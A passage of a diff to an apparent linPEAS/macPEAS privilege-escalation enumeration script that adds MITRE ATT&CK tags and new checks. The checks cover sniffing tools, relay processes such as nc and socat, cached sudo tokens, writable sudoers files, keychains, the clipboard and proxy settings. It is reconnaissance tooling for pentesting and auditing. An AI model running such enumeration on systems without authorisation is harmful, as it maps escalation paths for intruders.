-4959,7 +6842,7 @@ parse_proc_route() { } # Function to parse ARP information from /proc/net/arp parse_proc_arp() { - print_3title "ARP Table (from /proc/net/arp)" + print_3title "ARP Table (from /proc/net/arp)" "T1018,T1040" echo "IP address HW type Flags HW address Mask Device" echo "------------------------------------------------------------------------" # Skip header line and process each ARP entry @@ -4979,9 +6862,9 @@ parse_proc_arp() { } # Function to get network neighbors information get_network_neighbors() { - print_2title "Networks and neighbours" + print_2title "Networks and neighbours" "T1018,T1040" # Get routing information - print_3title "Routing Information" + print_3title "Routing Information" "T1018,T1040" if [ "$MACPEAS" ]; then # macOS specific if command -v netstat >/dev/null 2>&1; then @@ -5004,7 +6887,7 @@ get_network_neighbors() { fi fi # Get ARP information - print_3title "ARP Information" + print_3title "ARP Information" "T1018,T1040" if command -v arp >/dev/null 2>&1; then if [ "$MACPEAS" ]; then arp -a 2>/dev/null @@ -5017,7 +6900,7 @@ get_network_neighbors() { echo "No ARP information available" fi # Additional neighbor discovery methods - print_3title "Additional Neighbor Information" + print_3title "Additional Neighbor Information" "T1018,T1040" # Check for IPv6 neighbors if available if [ -f "/proc/net/ipv6_neigh" ]; then echo "IPv6 Neighbors:" @@ -5047,6 +6930,9 @@ if [ "$EXTRA_CHECKS" ]; then get_network_neighbors fi +fi + +if check_mitre_filter "T1049"; then # Function to get process info from inode get_process_info() { local inode=$1 @@ -5075,7 +6961,7 @@ parse_proc_net_ports() { local header="Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name" local header_sep="--------------------------------------------------------------------------------" if [ -f "$proc_file" ]; then - print_3title "Active $proto Ports (from /proc/net/$proto)" + print_3title "Active $proto Ports (from /proc/net/$proto)" "T1049" echo "$header" echo "$header_sep" # Process each connection using a pipe @@ -5130,23 +7016,59 @@ parse_proc_net_ports() { } # Function to get open ports information get_open_ports() { - print_2title "Active Ports" + print_2title "Active Ports" "T1049" print_info "https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#open-ports" # Try standard tools first if command -v netstat >/dev/null 2>&1; then - print_3title "Active Ports (netstat)" + print_3title "Active Ports (netstat)" "T1049" netstat -punta 2>/dev/null | grep -i listen | sed -${E} "s,127.0.[0-9]+.[0-9]+|:::|::1:|0\.0\.0\.0,${SED_RED},g" elif command -v ss >/dev/null 2>&1; then - print_3title "Active Ports (ss)" + print_3title "Active Ports (ss)" "T1049" ss -nltpu 2>/dev/null | grep -i listen | sed -${E} "s,127.0.[0-9]+.[0-9]+|:::|::1:|0\.0\.0\.0,${SED_RED},g" else # Fallback to parsing /proc/net files parse_proc_net_ports "tcp" parse_proc_net_ports "udp" fi + # Focused local service exposure view + print_3title "Local-only listeners (loopback)" "T1049" + if command -v ss >/dev/null 2>&1; then + ss -nltpu 2>/dev/null | grep -E "127\.0\.0\.1:|::1:" | sed -${E} "s,127\.0\.0\.1:|::1:,${SED_RED},g" + elif command -v netstat >/dev/null 2>&1; then + netstat -punta 2>/dev/null | grep -i listen | grep -E "127\.0\.0\.1:|::1:" | sed -${E} "s,127\.0\.0\.1:|::1:,${SED_RED},g" + fi + print_3title "Unique listener bind addresses" "T1049" + if command -v ss >/dev/null 2>&1; then + ss -nltpuH 2>/dev/null | awk '{ + a=$5 + if (a ~ /^\[/) { + sub(/^\[/, "", a) + sub(/\]:[0-9]+$/, "", a) + } else if (a ~ /:[0-9]+$/) { + sub(/:[0-9]+$/, "", a) + } + sub(/^::ffff:/, "", a) + if (a != "") print a + }' | sort -u | sed -${E} "s,127\.0\.0\.1|::1,${SED_RED},g" + elif command -v netstat >/dev/null 2>&1; then + netstat -punta 2>/dev/null | grep -i listen | awk '{ + a=$4 + if (a ~ /^\[/) { + sub(/^\[/, "", a) + sub(/\]:[0-9]+$/, "", a) + } else if (a ~ /:[0-9]+$/) { + sub(/:[0-9]+$/, "", a) + } + if (a == ":::" ) a="::" + sub(/^::ffff:/, "", a) + if (a != "") print a + }' | sort -u | sed -${E} "s,127\.0\.0\.1|::1,${SED_RED},g" + fi + print_3title "Potential local forwarders/relays" "T1049" + ps aux 2>/dev/null | grep -E "[s]ocat|[s]sh .*(-L|-R|-D)|[n]cat|[n]c .*-l" | sed -${E} "s,socat|ssh|-L|-R|-D|ncat|nc,${SED_RED_YELLOW},g" # Additional port information if [ "$EXTRA_CHECKS" ] || [ "$DEBUG" ]; then - print_3title "Additional Port Information" + print_3title "Additional Port Information" "T1049" # Check for listening ports in /proc/net/unix if [ -f "/proc/net/unix" ]; then echo "Unix Domain Sockets:" @@ -5194,26 +7116,29 @@ get_open_ports() { } get_open_ports +fi + +if check_mitre_filter "T1016"; then # Function to get network capabilities information get_macos_network_capabilities() { - print_2title "Network Capabilities" + print_2title "Network Capabilities" "T1016" # Basic network information echo "" - print_3title "Network Interfaces and Configuration" + print_3title "Network Interfaces and Configuration" "T1016" warn_exec system_profiler SPNetworkDataType # Network locations echo "" - print_3title "Network Locations" + print_3title "Network Locations" "T1016" warn_exec system_profiler SPNetworkLocationDataType # Network extensions echo "" - print_3title "Network Extensions" + print_3title "Network Extensions" "T1016" if [ -d "/Library/SystemExtensions" ]; then warn_exec systemextensionsctl list fi # Network security echo "" - print_3title "Network Security" + print_3title "Network Security" "T1016" if command -v networksetup >/dev/null 2>&1; then echo "Firewall Status:" warn_exec networksetup -getglobalstate @@ -5231,25 +7156,25 @@ get_macos_network_capabilities() { if [ "$EXTRA_CHECKS" ]; then # Network preferences echo "" - print_3title "Network Preferences" + print_3title "Network Preferences" "T1016" if [ -f "/Library/Preferences/SystemConfiguration/preferences.plist" ]; then warn_exec plutil -p /Library/Preferences/SystemConfiguration/preferences.plist | grep -A 5 "NetworkServices" fi # Network statistics echo "" - print_3title "Network Statistics" + print_3title "Network Statistics" "T1016" warn_exec netstat -s # Network routes echo "" - print_3title "Network Routes" + print_3title "Network Routes" "T1016" warn_exec netstat -rn # Network interfaces details echo "" - print_3title "Network Interfaces Details" + print_3title "Network Interfaces Details" "T1016" warn_exec ifconfig -a # Network kernel extensions echo "" - print_3title "Network Kernel Extensions" + print_3title "Network Kernel Extensions" "T1016" warn_exec kextstat | grep -i network fi echo "" @@ -5258,6 +7183,9 @@ if [ "$MACPEAS" ]; then get_macos_network_capabilities fi +fi + +if check_mitre_filter "T1016"; then # Function to check if a port is listening check_listening_port() { local port=$1 @@ -5269,7 +7197,7 @@ check_listening_port() { } # Function to get sharing services status get_sharing_services_status() { - print_2title "MacOS Sharing Services Status" + print_2title "MacOS Sharing Services Status" "T1016" # Define services and their ports using parallel arrays services="Screen Sharing File Sharing Remote Login Remote Management Remote Apple Events Back to My Mac AirPlay Receiver AirDrop Bonjour Printer Sharing Internet Sharing" ports="5900 88,445,548 22 3283 3031 4488 7000 5353 5353 515,631 67,68" @@ -5313,7 +7241,7 @@ get_sharing_services_status() { } # Function to get VPN information get_vpn_info() { - print_3title "VPN Information" + print_3title "VPN Information" "T1016" # Get VPN configurations warn_exec system_profiler SPNetworkLocationDataType | grep -A 5 -B 7 ": Password" | sed -${E} "s,Password|Authorization Name.*,${SED_RED},g" # Check for VPN profiles @@ -5328,7 +7256,7 @@ get_vpn_info() { } # Function to get firewall information get_firewall_info() { - print_3title "Firewall Information" + print_3title "Firewall Information" "T1016" # Get firewall status warn_exec system_profiler SPFirewallDataType # Get application firewall rules @@ -5346,7 +7274,7 @@ get_firewall_info() { # Function to get additional network information get_additional_network_info() { if [ "$EXTRA_CHECKS" ]; then - print_3title "Additional Network Information" + print_3title "Additional Network Information" "T1016" # Bluetooth information echo "Bluetooth Status:" warn_exec system_profiler SPBluetoothDataType @@ -5382,6 +7310,9 @@ if [ "$MACPEAS" ]; then get_macos_network_services fi +fi + +if check_mitre_filter "T1040"; then # Function to check if a command exists and is executable check_command() { local cmd=$1 @@ -5395,8 +7326,17 @@ check_command() { # Function to check if we can sniff on an interface check_interface_sniffable() { local iface=$1 - if timeout 1 tcpdump -i "$iface" -c 1 >/dev/null 2>&1; then - return 0 + if check_command tcpdump; then + if timeout 1 tcpdump -i "$iface" -c 1 >/dev/null 2>&1; then + return 0 + fi + elif check_command dumpcap; then + dumpcap_test_file="/tmp/.linpeas_dumpcap_test_$$.pcap" + if timeout 2 dumpcap -i "$iface" -c 1 -q -w "$dumpcap_test_file" >/dev/null 2>&1; then + rm -f "$dumpcap_test_file" 2>/dev/null + return 0 + fi + rm -f "$dumpcap_test_file" 2>/dev/null fi return 1 } @@ -5410,16 +7350,28 @@ check_promiscuous_mode() { } # Main function to check network traffic analysis capabilities check_network_traffic_analysis() { - print_2title "Network Traffic Analysis Capabilities" + print_2title "Network Traffic Analysis Capabilities" "T1040" # Check for sniffing tools echo "" - print_3title "Available Sniffing Tools" + print_3title "Available Sniffing Tools" "T1040" tools_found=0 if check_command tcpdump; then echo "tcpdump is available" | sed -${E} "s,.*,${SED_GREEN},g" tools_found=1 # Check tcpdump version and capabilities warn_exec tcpdump --version 2>/dev/null | head -n 1 + getcap "$(command -v tcpdump)" 2>/dev/null + fi + if check_command dumpcap; then + echo "dumpcap is available" | sed -${E} "s,.*,${SED_GREEN},g" + tools_found=1 + warn_exec dumpcap --version 2>/dev/null | head -n 1 + getcap "$(command -v dumpcap)" 2>/dev/null + if id -nG 2>/dev/null | grep -qw wireshark; then + echo "Current user is in wireshark group" | sed -${E} "s,.*,${SED_GREEN},g" + elif getent group wireshark >/dev/null 2>&1; then + echo "wireshark group exists but current user is not in it" | sed -${E} "s,.*,${SED_RED_YELLOW},g" + fi fi if check_command tshark; then echo "tshark is available" | sed -${E} "s,.*,${SED_GREEN},g" @@ -5431,12 +7383,27 @@ check_network_traffic_analysis() { echo "wireshark is available" | sed -${E} "s,.*,${SED_GREEN},g" tools_found=1 fi + if check_command ngrep; then + echo "ngrep is available" | sed -${E} "s,.*,${SED_GREEN},g" + tools_found=1 + fi + if check_command tcpflow; then + echo "tcpflow is available" | sed -${E} "s,.*,${SED_GREEN},g" + tools_found=1 + fi if [ $tools_found -eq 0 ]; then echo "No sniffing tools found" | sed -${E} "s,.*,${SED_RED},g" fi + if check_command tcpdump; then + echo "Sniffable interfaces according to tcpdump -D:" + timeout 2 tcpdump -D 2>/dev/null + elif check_command dumpcap; then + echo "Sniffable interfaces according to dumpcap -D:" + timeout 2 dumpcap -D 2>/dev/null + fi # Check network interfaces echo "" - print_3title "Network Interfaces Sniffing Capabilities" + print_3title "Network Interfaces Sniffing Capabilities" "T1040" interfaces_found=0 # Get list of network interfaces if command -v ip >/dev/null 2>&1; then @@ -5447,23 +7414,25 @@ check_network_traffic_analysis() { interfaces=$(ls /sys/class/net/ 2>/dev/null) fi for iface in $interfaces; do - if [ "$iface" != "lo" ]; then # Skip loopback + if [ "$iface" = "lo" ]; then + echo -n "Interface $iface (loopback): " + else echo -n "Interface $iface: " - if check_interface_sniffable "$iface"; then - echo "Sniffable" | sed -${E} "s,.*,${SED_GREEN},g" - interfaces_found=1 - # Check promiscuous mode - if check_promiscuous_mode "$iface"; then - echo " - Promiscuous mode enabled" | sed -${E} "s,.*,${SED_RED},g" - fi - # Get interface details - if [ "$EXTRA_CHECKS" ]; then - echo " - Interface details:" - warn_exec ip addr show "$iface" 2>/dev/null || ifconfig "$iface" 2>/dev/null - fi - else - echo "Not sniffable" | sed -${E} "s,.*,${SED_RED},g" + fi + if check_interface_sniffable "$iface"; then + echo "Sniffable" | sed -${E} "s,.*,${SED_GREEN},g" + interfaces_found=1 + # Check promiscuous mode + if [ "$iface" != "lo" ] && check_promiscuous_mode "$iface"; then + echo " - Promiscuous mode enabled" | sed -${E} "s,.*,${SED_RED},g" fi + # Get interface details + if [ "$EXTRA_CHECKS" ]; then + echo " - Interface details:" + warn_exec ip addr show "$iface" 2>/dev/null || ifconfig "$iface" 2>/dev/null + fi + else + echo "Not sniffable" | sed -${E} "s,.*,${SED_RED},g" fi done if [ $interfaces_found -eq 0 ]; then @@ -5472,7 +7441,7 @@ check_network_traffic_analysis() { # Check for sensitive traffic patterns if we have sniffing capabilities if [ $tools_found -eq 1 ] && [ $interfaces_found -eq 1 ]; then echo "" - print_3title "Sensitive Traffic Detection" + print_3title "Sensitive Traffic Detection" "T1040" print_info "Checking for common sensitive traffic patterns..." # List of sensitive traffic patterns to check patterns=" @@ -5497,11 +7466,15 @@ check_network_traffic_analysis() { print_info "To capture sensitive traffic, you can use:" echo "tcpdump -i -w capture.pcap" | sed -${E} "s,.*,${SED_GREEN},g" echo "tshark -i -w capture.pcap" | sed -${E} "s,.*,${SED_GREEN},g" + echo "dumpcap -i -w capture.pcap" | sed -${E} "s,.*,${SED_GREEN},g" fi + echo "" + print_3title "Running sniffing/traffic reconstruction processes" "T1040" + ps aux 2>/dev/null | grep -E "[t]cpdump|[d]umpcap|[t]shark|[w]ireshark|[n]grep|[t]cpflow" | sed -${E} "s,.*,${SED_RED_YELLOW},g" # Additional information if [ "$EXTRA_CHECKS" ]; then echo "" - print_3title "Additional Network Analysis Information" + print_3title "Additional Network Analysis Information" "T1040" # Check for network monitoring tools echo "Checking for network monitoring tools..." for tool in nethogs iftop iotop nload bmon; do @@ -5515,6 +7488,9 @@ check_network_traffic_analysis() { # Run the main function check_network_traffic_analysis +fi + +if check_mitre_filter "T1016"; then # Function to check if a command exists and is executable check_command() { local cmd=$1 @@ -5528,7 +7504,7 @@ check_command() { # Function to analyze iptables rules analyze_iptables() { echo "" - print_3title "Iptables Rules" + print_3title "Iptables Rules" "T1016" # Check if iptables is available if ! check_command iptables; then echo_not_found "iptables" @@ -5563,7 +7539,7 @@ analyze_iptables() { # Function to analyze nftables rules analyze_nftables() { echo "" - print_3title "Nftables Rules" + print_3title "Nftables Rules" "T1016" # Check if nft is available if ! check_command nft; then echo_not_found "nftables" @@ -5579,6 +7555,8 @@ analyze_nftables() { # List all rules echo -e "\nNftables Ruleset:" warn_exec nft list ruleset 2>/dev/null + echo -e "\nNftables Ruleset with handles (-a):" + warn_exec nft -a list ruleset 2>/dev/null | sed -${E} "s,\\bdrop\\b|\\breject\\b|handle [0-9]+,${SED_RED_YELLOW},g" # Check for saved rules echo -e "\nSaved Rules:" for rules_file in /etc/nftables.conf /etc/sysconfig/nftables.conf; do @@ -5591,7 +7569,7 @@ analyze_nftables() { # Function to analyze firewalld rules analyze_firewalld() { echo "" - print_3title "Firewalld Rules" + print_3title "Firewalld Rules" "T1016" # Check if firewall-cmd is available if ! check_command firewall-cmd; then echo_not_found "firewalld" @@ -5623,7 +7601,7 @@ analyze_firewalld() { # Function to analyze UFW rules analyze_ufw() { echo "" - print_3title "UFW Rules" + print_3title "UFW Rules" "T1016" # Check if ufw is available if ! check_command ufw; then echo_not_found "ufw" @@ -5645,16 +7623,25 @@ analyze_ufw() { } # Main function to analyze firewall rules analyze_firewall_rules() { - print_2title "Firewall Rules Analysis" + print_2title "Firewall Rules Analysis" "T1016" # Analyze different firewall systems analyze_iptables analyze_nftables analyze_firewalld analyze_ufw + echo "" + print_3title "Forwarding and rp_filter" "T1016" + for sysctl_var in net.ipv4.ip_forward net.ipv6.conf.all.forwarding net.ipv4.conf.all.rp_filter; do + sysctl "$sysctl_var" 2>/dev/null | sed -${E} "s,=[[:space:]]*1,${SED_RED_YELLOW},g" + done + if check_command conntrack; then + echo -e "\nConntrack state (first 20):" + warn_exec conntrack -L 2>/dev/null | head -n 20 + fi # Additional checks if EXTRA_CHECKS is enabled if [ "$EXTRA_CHECKS" ]; then echo "" - print_3title "Additional Firewall Information" + print_3title "Additional Firewall Information" "T1016" # Check for common firewall configuration files echo "Checking for firewall configuration files..." for config_file in /etc/sysconfig/iptables /etc/sysconfig/ip6tables /etc/iptables/rules.v4 /etc/iptables/rules.v6 /etc/nftables.conf /etc/ufw/user.rules /etc/ufw/user6.rules; do @@ -5675,6 +7662,9 @@ analyze_firewall_rules() { # Run the main function analyze_firewall_rules +fi + +if check_mitre_filter "T1049"; then # Function to check if a command exists and is executable check_command() { local cmd=$1 @@ -5688,7 +7678,7 @@ check_command() { # Function to analyze inetd services analyze_inetd() { echo "" - print_3title "Inetd Services" + print_3title "Inetd Services" "T1049" # Check if inetd is installed if ! check_command inetd; then echo_not_found "inetd" @@ -5722,7 +7712,7 @@ analyze_inetd() { # Function to analyze xinetd services analyze_xinetd() { echo "" - print_3title "Xinetd Services" + print_3title "Xinetd Services" "T1049" # Check if xinetd is installed if ! check_command xinetd; then echo_not_found "xinetd" @@ -5776,7 +7766,7 @@ analyze_xinetd() { # Function to check for running inetd/xinetd services check_running_services() { echo "" - print_3title "Running Inetd/Xinetd Services" + print_3title "Running Inetd/Xinetd Services" "T1049" # Check netstat for services if check_command netstat; then echo "Active Services (from netstat):" @@ -5795,7 +7785,7 @@ check_running_services() { } # Main function to analyze inetd/xinetd services analyze_inetd_services() { - print_2title "Inetd/Xinetd Services Analysis" + print_2title "Inetd/Xinetd Services Analysis" "T1049" # Analyze inetd and xinetd services analyze_inetd analyze_xinetd @@ -5804,7 +7794,7 @@ analyze_inetd_services() { # Additional checks if EXTRA_CHECKS is enabled if [ "$EXTRA_CHECKS" ]; then echo "" - print_3title "Additional Inetd/Xinetd Information" + print_3title "Additional Inetd/Xinetd Information" "T1049" # Check for inetd/xinetd logs echo "Checking for service logs..." for log_file in /var/log/inetd.log /var/log/xinetd.log /var/log/messages /var/log/syslog; do @@ -5827,28 +7817,34 @@ analyze_inetd_services() { # Run the main function analyze_inetd_services +fi + +if check_mitre_filter "T1016"; then if [ "$MACPEAS" ] && [ "$EXTRA_CHECKS" ]; then - print_2title "Hardware Ports" + print_2title "Hardware Ports" "T1016" networksetup -listallhardwareports echo "" - print_2title "VLANs" + print_2title "VLANs" "T1016" networksetup -listVLANs echo "" - print_2title "Wifi Info" + print_2title "Wifi Info" "T1016" networksetup -getinfo Wi-Fi echo "" - print_2title "Check Enabled Proxies" + print_2title "Check Enabled Proxies" "T1016" scutil --proxy echo "" - print_2title "Wifi Proxy URL" + print_2title "Wifi Proxy URL" "T1016" networksetup -getautoproxyurl Wi-Fi echo "" - print_2title "Wifi Web Proxy" + print_2title "Wifi Web Proxy" "T1016" networksetup -getwebproxy Wi-Fi echo "" fi -print_2title "Internet Access?" +fi + +if check_mitre_filter "T1016,T1590"; then +print_2title "Internet Access?" "T1016,T1590" TIMEOUT_INTERNET_SECONDS=5 if [ "$SUPERFAST" ]; then TIMEOUT_INTERNET_SECONDS=2.5 @@ -5858,8 +7854,8 @@ check_tcp_80 "$TIMEOUT_INTERNET_SECONDS" 2>/dev/null & pid1=$! check_tcp_443 "$TIMEOUT_INTERNET_SECONDS" 2>/dev/null & pid2=$! check_icmp "$TIMEOUT_INTERNET_SECONDS" 2>/dev/null & pid3=$! check_dns "$TIMEOUT_INTERNET_SECONDS" 2>/dev/null & pid4=$! -# Kill all after 10 seconds -(sleep $(( $TIMEOUT_INTERNET_SECONDS + 1 )) && kill -9 $pid1 $pid2 $pid3 $pid4 2>/dev/null) & +# Kill all check workers after timeout + 1s without relying on integer arithmetic +(sleep "$TIMEOUT_INTERNET_SECONDS"; sleep 1; kill -9 $pid1 $pid2 $pid3 $pid4 2>/dev/null) & check_tcp_443_bin $TIMEOUT_INTERNET_SECONDS 2>/dev/null tcp443_bin_status=$? wait $pid1 $pid2 $pid3 $pid4 2>/dev/null @@ -5868,12 +7864,20 @@ wait 2>/dev/null if [ "$tcp443_bin_status" -eq 0 ] && \ [ -z "$SUPERFAST" ] && [ -z "$NOT_CHECK_EXTERNAL_HOSTNAME" ]; then echo "" - print_2title "Is hostname malicious or leaked?" + print_2title "Is hostname malicious or leaked?" "T1016,T1590" print_info "This will check the public IP and hostname in known malicious lists and leaks to find any relevant information about the host." check_external_hostname 2>/dev/null fi echo "" +print_3title "Proxy discovery" "T1016,T1590" +print_info "Checking common proxy env vars and apt proxy config" +(env | grep -iE '^(http|https|ftp|all)_proxy=|^no_proxy=') 2>/dev/null | sed -${E} "s,_proxy|no_proxy,${SED_RED_YELLOW},g" +grep -RinE 'Acquire::(http|https)::Proxy|proxy' /etc/apt/apt.conf /etc/apt/apt.conf.d 2>/dev/null | sed -${E} "s,proxy|Acquire::http::Proxy|Acquire::https::Proxy,${SED_RED_YELLOW},g" +echo "" +fi + +fi fi echo '' @@ -5881,20 +7885,28 @@ echo '' if [ "$WAIT" ]; then echo "Press enter to continue"; read "asd"; fi if echo $CHECKS | grep -q users_information; then +if check_mitre_filter "T1548.003,T1548.004,T1068,T1087.001,T1069.001,T1033,T1201,T1110.001,T1543.001,T1555.001,T1552.004,T1115"; then print_title "Users Information" +if check_mitre_filter "T1033,T1543.001"; then if [ "$MACPEAS" ];then - print_2title "Current user Login and Logout hooks" + print_2title "Current user Login and Logout hooks" "T1033,T1543.001" defaults read $HOME/Library/Preferences/com.apple.loginwindow.plist 2>/dev/null | grep -e "Hook" echo "" fi -print_2title "My user" +fi + +if check_mitre_filter "T1033"; then +print_2title "My user" "T1033" print_info "https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#users" (id || (whoami && groups)) 2>/dev/null | sed -${E} "s,$groupsB,${SED_RED},g" | sed -${E} "s,$groupsVB,${SED_RED_YELLOW},g" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed "s,$USER,${SED_LIGHT_MAGENTA},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$knw_usrs,${SED_GREEN},g" | sed "s,root,${SED_RED}," | sed -${E} "s,$knw_grps,${SED_GREEN},g" | sed -${E} "s,$idB,${SED_RED},g" echo "" +fi + +if check_mitre_filter "T1543.001"; then if [ "$MACPEAS" ];then - print_2title "All Login and Logout hooks" + print_2title "All Login and Logout hooks" "T1543.001" for user_home in /Users/*/ /private/var/root/; do if [ -f "${user_home}Library/Preferences/com.apple.loginwindow.plist" ]; then echo "User: $(basename "$user_home")" | sed -${E} "s,.*,${SED_LIGHT_CYAN},g" @@ -5904,8 +7916,11 @@ if [ "$MACPEAS" ];then echo "" fi +fi + +if check_mitre_filter "T1555.001"; then if [ "$MACPEAS" ];then - print_2title "Keychains" + print_2title "Keychains" "T1555.001" print_info "https://book.hacktricks.wiki/en/macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/macos-sensitive-locations.html#chainbreaker" echo "System Keychains:" | sed -${E} "s,.*,${SED_LIGHT_CYAN},g" security list-keychains 2>/dev/null | sed -${E} "s,.*,${SED_RED},g" @@ -5919,8 +7934,11 @@ if [ "$MACPEAS" ];then echo "" fi +fi + +if check_mitre_filter "T1555.001"; then if [ "$MACPEAS" ];then - print_2title "SystemKey" + print_2title "SystemKey" "T1555.001" echo "The SystemKey is used by FileVault to encrypt/decrypt the volume. If you can read it, you might be able to decrypt the disk." echo -e "\nSystemKey file permissions:" | sed -${E} "s,.*,${SED_LIGHT_CYAN},g" ls -l /var/db/SystemKey 2>/dev/null | sed -${E} "s,.*,${SED_RED_YELLOW},g" @@ -5932,7 +7950,10 @@ if [ "$MACPEAS" ];then echo "" fi -print_2title "PGP Keys and Related Files" +fi + +if check_mitre_filter "T1552.004"; then +print_2title "PGP Keys and Related Files" "T1552.004" print_info "https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#pgp-keys" # Check for GPG echo "GPG:" | sed -${E} "s,.*,${SED_LIGHT_CYAN},g" @@ -5964,8 +7985,11 @@ for pgp_file in "$HOME/.gnupg" "$HOME/.pgp" "$HOME/.openpgp" "$HOME/.ssh/gpg-age done echo "" +fi + +if check_mitre_filter "T1115"; then if [ "$(command -v xclip 2>/dev/null || echo -n '')" ] || [ "$(command -v xsel 2>/dev/null || echo -n '')" ] || [ "$(command -v pbpaste 2>/dev/null || echo -n '')" ] || [ "$(command -v wl-paste 2>/dev/null || echo -n '')" ] || [ "$DEBUG" ]; then - print_2title "Clipboard and Highlighted Text" + print_2title "Clipboard and Highlighted Text" "T1115" print_info "https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#clipboard" # Function to check clipboard content check_clipboard() { @@ -6001,17 +8025,32 @@ if [ "$(command -v xclip 2>/dev/null || echo -n '')" ] || [ "$(command -v xsel 2 echo "" fi -print_2title "Checking 'sudo -l', /etc/sudoers, and /etc/sudoers.d" +fi + +if check_mitre_filter "T1548.003"; then +print_2title "Checking 'sudo -l', /etc/sudoers, and /etc/sudoers.d" "T1548.003" print_info "https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#sudo-and-suid" (echo '' | timeout 1 sudo -S -l | sed "s,_proxy,${SED_RED},g" | sed "s,$sudoG,${SED_GREEN},g" | sed -${E} "s,$sudoVB1,${SED_RED_YELLOW}," | sed -${E} "s,$sudoVB2,${SED_RED_YELLOW}," | sed -${E} "s,$sudoB,${SED_RED},g" | sed "s,\!root,${SED_RED},") 2>/dev/null || echo_not_found "sudo" if [ "$PASSWORD" ]; then (echo "$PASSWORD" | timeout 1 sudo -S -l | sed "s,_proxy,${SED_RED},g" | sed "s,$sudoG,${SED_GREEN},g" | sed -${E} "s,$sudoVB1,${SED_RED_YELLOW}," | sed -${E} "s,$sudoVB2,${SED_RED_YELLOW}," | sed -${E} "s,$sudoB,${SED_RED},g") 2>/dev/null || echo_not_found "sudo" fi +(sudo -n -l 2>/dev/null | sed "s,_proxy,${SED_RED},g" | sed "s,$sudoG,${SED_GREEN},g" | sed -${E} "s,$sudoVB1,${SED_RED_YELLOW}," | sed -${E} "s,$sudoVB2,${SED_RED_YELLOW}," | sed -${E} "s,$sudoB,${SED_RED},g" | sed "s,\!root,${SED_RED},") 2>/dev/null || echo "No cached sudo token (sudo -n -l)" +secure_path_line=$(sudo -l 2>/dev/null | grep -o "secure_path=[^,]*" | head -n 1 | cut -d= -f2) +if [ "$secure_path_line" ]; then + for p in $(echo "$secure_path_line" | tr ':' ' '); do + if [ -w "$p" ]; then + echo "Writable secure_path entry: $p" | sed -${E} "s,.*,${SED_RED},g" + fi + done +fi ( grep -Iv "^$" cat /etc/sudoers | grep -v "#" | sed "s,_proxy,${SED_RED},g" | sed "s,$sudoG,${SED_GREEN},g" | sed -${E} "s,$sudoVB1,${SED_RED_YELLOW}," | sed -${E} "s,$sudoVB2,${SED_RED_YELLOW}," | sed -${E} "s,$sudoB,${SED_RED},g" | sed "s,pwfeedback,${SED_RED},g" ) 2>/dev/null || echo_not_found "/etc/sudoers" if ! [ "$IAMROOT" ] && [ -w '/etc/sudoers.d/' ]; then echo "You can create a file in /etc/sudoers.d/ and escalate privileges" | sed -${E} "s,.*,${SED_RED_YELLOW}," fi for f in /etc/sudoers.d/*; do + if [ -w "$f" ]; then + echo "Sudoers file: $f is writable and may allow privilege escalation" | sed -${E} "s,.*,${SED_RED_YELLOW},g" + fi if [ -r "$f" ]; then echo "Sudoers file: $f is readable" | sed -${E} "s,.*,${SED_RED},g" grep -Iv "^$" "$f" | grep -v "#" | sed "s,_proxy,${SED_RED},g" | sed "s,$sudoG,${SED_GREEN},g" | sed -${E} "s,$sudoVB1,${SED_RED_YELLOW}," | sed -${E} "s,$sudoVB2,${SED_RED_YELLOW}," | sed -${E} "s,$sudoB,${SED_RED},g" | sed "s,pwfeedback,${SED_RED},g" @@ -6019,8 +8058,11 @@ for f in /etc/sudoers.d/*; do done echo "" +fi + get_current_user_privot_pid -print_2title "Checking sudo tokens" +if check_mitre_filter "T1548.003"; then +print_2title "Checking sudo tokens" "T1548.003" print_info "https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#reusing-sudo-tokens" ptrace_scope="$(cat /proc/sys/kernel/yama/ptrace_scope 2>/dev/null)" if [ "$ptrace_scope" ] && [ "$ptrace_scope" -eq 0 ]; then @@ -6041,10 +8083,26 @@ if [ "$ptrace_scope" ] && [ "$ptrace_scope" -eq 0 ]; then else echo "ptrace protection is enabled ($ptrace_scope)" | sed "s,is enabled,${SED_GREEN},g"; fi +if [ -d "/var/run/sudo/ts" ]; then + echo "Sudo token directory perms:" | sed -${E} "s,.*,${SED_LIGHT_CYAN},g" + ls -ld /var/run/sudo/ts 2>/dev/null + if [ -w "/var/run/sudo/ts" ]; then + echo "/var/run/sudo/ts is writable" | sed -${E} "s,.*,${SED_RED},g" + fi + if [ -f "/var/run/sudo/ts/$USER" ]; then + ls -l "/var/run/sudo/ts/$USER" 2>/dev/null + if [ -w "/var/run/sudo/ts/$USER" ]; then + echo "User sudo token file is writable" | sed -${E} "s,.*,${SED_RED},g" + fi + fi +fi echo "" +fi + +if check_mitre_filter "T1548.003"; then if [ -f "/etc/doas.conf" ] || [ -f "/usr/local/etc/doas.conf" ] || [ "$DEBUG" ]; then - print_2title "Doas Configuration" + print_2title "Doas Configuration" "T1548.003" print_info "https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#doas" # Find doas binary and its config locations doas_bin=$(command -v doas 2>/dev/null) @@ -6080,10 +8138,13 @@ else fi echo "" -print_2title "Checking Pkexec and Polkit" +fi + +if check_mitre_filter "T1548.003,T1548.004,T1068"; then +print_2title "Checking Pkexec and Polkit" "T1548.003,T1548.004,T1068" print_info "https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/interesting-groups-linux-pe/index.html#pe---method-2" echo "" -print_3title "Polkit Binary" +print_3title "Polkit Binary" "T1548.003,T1068" # Check pkexec binary pkexec_bin=$(command -v pkexec 2>/dev/null) if [ -n "$pkexec_bin" ]; then @@ -6095,11 +8156,15 @@ if [ -n "$pkexec_bin" ]; then # Check polkit version for known vulnerabilities if command -v pkexec >/dev/null 2>&1; then pkexec --version 2>/dev/null + pkexec_version="$(pkexec --version 2>/dev/null | grep -oE '[0-9]+(\.[0-9]+)+')" + if [ "$pkexec_version" ] && [ "$(printf '%s\n' "$pkexec_version" "0.120" | sort -V | head -n1)" = "$pkexec_version" ] && [ "$pkexec_version" != 